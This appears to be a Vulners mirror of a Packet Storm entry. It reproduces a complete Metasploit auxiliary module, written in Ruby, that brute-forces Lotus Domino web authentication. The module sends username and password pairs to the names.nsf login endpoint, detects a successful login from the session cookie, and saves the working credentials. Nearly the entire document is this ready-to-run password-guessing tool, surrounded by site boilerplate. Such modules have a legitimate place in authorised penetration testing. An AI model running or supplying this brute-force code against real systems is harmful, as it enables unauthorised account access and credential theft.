Vulners
Lucene search
Lotus Domino Brute Force Utility
🗓️ 01 Sep 2024 00:00:00Reported by Tiago Ferreira, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 136 Views
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Lotus Domino Brute Force Utility',
'Description' => 'Lotus Domino Authentication Brute Force Utility',
'Author' => 'Tiago Ferreira <tiago.ccna[at]gmail.com>',
'License' => MSF_LICENSE
)
end
def run_host(ip)
each_user_pass { |user, pass|
do_login(user, pass)
}
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def do_login(user=nil,pass=nil)
post_data = "username=#{Rex::Text.uri_encode(user.to_s)}&password=#{Rex::Text.uri_encode(pass.to_s)}&RedirectTo=%2Fnames.nsf"
vprint_status("http://#{vhost}:#{rport} - Lotus Domino - Trying username:'#{user}' with password:'#{pass}'")
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/names.nsf?Login',
'data' => post_data,
}, 20)
if res and res.code == 302
if res.get_cookies.match(/DomAuthSessId=(.*);(.*)/i)
print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL login for '#{user}' : '#{pass}'")
report_cred(
ip: rhost,
port: rport,
service_name: (ssl ? "https" : "http"),
user: user,
password: pass,
proof: "WEBAPP=\"Lotus Domino\", VHOST=#{vhost}, COOKIE=#{res.get_cookies}"
)
return :next_user
end
print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response")
return :abort
elsif res.body.to_s =~ /names.nsf\?Login/
vprint_error("http://#{vhost}:#{rport} - Lotus Domino - Failed to login as '#{user}'")
return
else
print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized #{res.code} response") if res
return :abort
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7.4High risk
Vulners AI Score7.4